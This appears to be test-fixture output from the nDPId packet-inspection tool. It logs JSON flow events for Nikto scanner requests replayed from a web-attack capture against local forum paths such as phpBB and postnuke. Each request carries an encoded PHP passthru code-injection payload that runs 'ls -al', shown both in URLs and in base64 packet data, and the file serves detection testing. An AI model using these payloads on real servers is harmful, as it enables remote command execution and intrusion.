-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01226{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7580000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7580000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277812,"pkt":"AAAAAAAAAAAAAAAACABFAAFvwN5AAEAGeqh\/AAABfwAAAccEH5A7SvnykFHzA4AYAED\/YwAAAQEICp1m\/1ydZv9cR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":693,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277813,"pkt":"AAAAAAAAAAAAAAAACABFAAFt2OpAAEAGYp5\/AAABfwAAAccGH5BS6uHGYiCIs4AYAED\/YQAAAQEICp1m\/12dZv9dR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":379,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":379,"pkt_l4_len":345,"thread_ts_msec":1576420277814,"pkt":"AAAAAAAAAAAAAAAACABFAAFt1fZAAEAGZZJ\/AAABfwAAAccIH5Bl1OzaDJYmQ4AYAED\/YQAAAQEICp1m\/16dZv9eR0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 